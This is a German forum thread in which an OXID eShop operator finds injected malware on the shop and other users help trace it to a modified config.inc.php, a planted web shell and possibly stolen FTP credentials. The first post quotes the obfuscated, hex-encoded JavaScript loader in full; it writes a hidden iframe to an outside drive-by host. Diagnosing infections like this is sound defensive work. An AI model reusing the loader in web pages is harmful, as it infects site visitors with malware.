Hilfe - Schadcode im CE!

Hallo,

nachdem unser Shopconnector aktuell keine Verbindung herstellen kann bin ich bei der Fehlersuche online per Firebug im Admin-Bereich und Shop-Frontend - direkt nach dem öffnenden body-Tahg jeweils, auf einen iFrame gestoßen mit Quelle:

böser link

[B]edit moderator: link entfernt, bitte nicht direkt solche links posten![/B]

Ruft man diese URl direkt auf, meldet FireFox eine Pishing-Versuch.

Das Script scheint im navigation-Frame, basefrm Frame und header-Frame eingebunden zu werden. Oxid CE 4.2.0.

Überall im Quelltext (auch im Frontend) steht als erstes, noch vor Doctype, ein JavaScript:

<script language="JavaScript" type="text/javascript">
var i,y,x="3c696672616d65207372633d687474703a2f2f7777772e76616e6465727363686f6f7462762e6e6c2f61646d696e6973747261746f722f636f6d706f6e656e74732f6c2e7068702077696474683d30206865696768743d30207374796c653d227669736962696c6974793a6e6f6e653b223e3c2f696672616d653e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);
</script>

Ich werde jetzt mal einen Dateivergleich mit einer Sicherung machen. Falls jemand was dazu sagen kann bitte ich um Info - Danke!

Nachtrag:

Der Javascript Code versucht Inhalte von der Domain 52chatshare.org zu laden:

Folgende Info dazu habe ich auf dieser Sparkassen-Website gefunden:

“15.07.2010: Uns liegen mehrere Hinweise aus vertrauenswürdigen Quellen vor, dass zur Zeit über Werbebanner auf diversen deutschen Web-Seiten versucht wird, PCs mit Malware zu infizieren. Es handelt sich hierbei um seriöse Web-Seiten auch aus dem Bereich Presse.
Die Infektion erfolgt durch Ausnutzung von Sicherheitslücken in Software, die auf den PCs installiert ist. Beim Surfen auf entsprechende Web-Seiten wird durch die Werbebanner über eine Vielzahl von Lücken automatisiert versucht, den PC zu infizieren. Man nennt dies Drive-By-Infektion. Es handelt sich u. a. um Lücken in der Java Runtime, im Adobe Reader und im Windows Hilfe- und Supportcenter.
Für die ausgenutzten Schwachstellen sind Patches verfügbar; teilweise allerdings erst seit wenigen Tagen. In Zusammenhang zu diesen Vorfällen steht möglicherweise auch das momentan gehäufte Auftreten von betrügerischen Hintergrundüberweisungen beim Online-Banking.
Empfehlung: Die maliziösen Werbebanner konnten u. a. auf folgende Web-Server zurückverfolgt werden: 194.8.250.211, 194.8.250.215, 52chatshare.org und woonv.in. Es sollte daher geprüft werden, ob Zugriffe auf diese Web-Seiten zentral blockiert werden können (Web-Proxy, Firewall, Content-Filter o. ä.). Durch die Sperrung dieser Server wird das Nachladen von Malware verhindert. Es wird an der Löschung der maliziösen Inhalte auf den Servern gearbeitet. Es ist davon auszugehen, dass noch weitere Server in ähnlicher Weise Malware verteilen. Zusätzlich wird empfohlen, umgehend die aktuellsten Patches der o. g. Software-Produkte einzuspielen.”

Wie das eingeschleust wird kann ich nicht nachvollziehen - ob bei mit´r als “User” oder auf dem Shopserver beim Provider, oder beim Shop-Besitzer auf dessen PC - ich arbeite hier auf nem Mac unter OS X 10.5., der Script Code steht auch bei abgeschalteten JavaScript in der Seite.

Bitte nochmals um Info falls jemand weiterhelfen kann, die Ursache einzukreisen und den Code wegzubekommen.

Danke!

Hi,

lad am besten den gesamten Inhalt des Shops in einen lokalen, separaten Ordner runter und such in allen Dateien nach dem javascript-Code. Bei einem Bekannten war er in der config.inc.php . Wie der Code dort in die config-Datei gekommen ist konnte auch Profihost nicht klären. Das Dateidatum war noch April - allerdings war die Berechtigung auf 777 gesetzt.

Gruß
Alex

Hallo Alex,

danke für den Tipp - auch bei uns war die config.inc.php mit dem Javascript versehen. Allerdings lagen dieRechte bei 644, weshalb ich mir das nicht erklären kann.

Nach Herausnehmen des JS erscheint der Code nirgends mehr.

Außerdem lag im Root eine Datei wso.php, die offenbar ein Dateinmanager o. Ä. ist (“Web Shell by oRb” steht drüber). Bei Aufruf verlangt sie ein Passwort. Evt. konnte darüber ein Angriff gestartet werden. Die Datei hat auch chmod Funktionen zum Rechte ändern drin.

Wie die auf den Server kam muss ich wohl den Provider fragen …

Danke nochmal für den entscheidenden Hinweis.

Hier gibts übrigens nen schönen Beitrag wie so Malware funktioniert und wie fies die zusammenprogrammiert sein kann: http://www.scip.ch/?labs.20091027

Gruß
Alex

Danke für den Link, bislang kannte ich nur Drive-Through …

Was mich immer noch beunruhigt ist, wie eine Datei wie wso.php ungefragt auf unseren Server kommen kann …

[QUOTE=hgw7media;36207]Was mich immer noch beunruhigt ist, wie eine Datei wie wso.php ungefragt auf unseren Server kommen kann …[/QUOTE]

Schlupfloch im FCKEditor? Oder einer anderen Upload-Komponente?

der liegt im admin bereich, da kommt man eigentlich so leicht nicht hin ohne login.

wie wärs mit: verseuchter rechner. ist in 90% der fälle der grund warum websites gehackt werden. da werden dann einfach login daten von bekannten ftp tools ausgelesen, oder keylogger im hintergrund installiert. einfach mal mit einer gescheiten antivirus live cd alles abscannen.

wenn die dateirechte richtig sind, dann ist das meistens das tor.

edit.

Wie das eingeschleust wird kann ich nicht nachvollziehen - ob bei mit´r als “User” oder auf dem Shopserver beim Provider, oder beim Shop-Besitzer auf dessen PC - ich arbeite hier auf nem Mac unter OS X 10.5., der Script Code steht auch bei abgeschalteten JavaScript in der Seite.

Auch wenn das oft nicht für wahr gehalten wird: Auch für macs gibts ne menge malware, die mac user haben ja auch keine schutzsoftware weil sie alle glauben das es keine malware für ihre rechner gibt. am besten beide rechner überprüfen. Auf Macs werden die Schädlinge einfach häufig garnicht gefunden.

Hallo,

wie wärs mit: verseuchter rechner. ist in 90% der fälle der grund warum websites gehackt werden. da werden dann einfach login daten von bekannten ftp tools ausgelesen, oder keylogger im hintergrund installiert.

Kann ich 100%ig bestätigen. Im Falle der guten Bekannten mit FTP-Daten von so einigen Kunden war es der Total Commander, der die Passwörter im Klartext in einen Standard-File legt.

Gruß

In vielen Fällen liegt das Problem aber auch einfach bei der Konfiguration des Servers.
Eine Webanwendung kann nur so sicher sein wie der Server, auf dem die Anwendung installiert wurde. Die meisten Angriffe die “durchgehen” finden auf Systemen statt, die von Laien verwaltet werden. Es gibt viele Shopbetreiber, die sich einen komplett eigenen Server mieten und diesen selbst pflegen müssen, weil sie das Geld für eine professionelle Wartung (was oft sehr teuer sein kann) sparen möchten oder die Wartung vom Anbieter einfach nicht angeboten wird. Wenn dann das nötige Wissen fehlt, einen Server abzusichern, dauert es nur wenige Tage, bis dies auch der “Untergrund” mitbekommt und es sich zu Nutze macht.

Es gab bereits Fälle von Kunden, bei denen ein anonymer FTP-Nutzer eingerichtet war, der ohne Kennwort auf bestimmte Dateien des Servers Zugriff hatte. Dabei konnten Dateien gelesen werden, die unter Anderem Zugangsdaten zur Datenbank und zum Administrationsbereich enthielten. Was dies für Schwierigkeiten mit sich bringt, kann sich jeder vorstellen.

Abgesehen davon, gibt es derzeit neue Berichte über Sicherheitslücken, die im Moment noch von uns überprüft werden. Da es aber nach unserer letzten Prüfung keine Anhaltspunkte für weitere potentielle Sicherheitsrisiken bezüglich der Software gab, denke ich nicht, dass sich das bestätigen wird.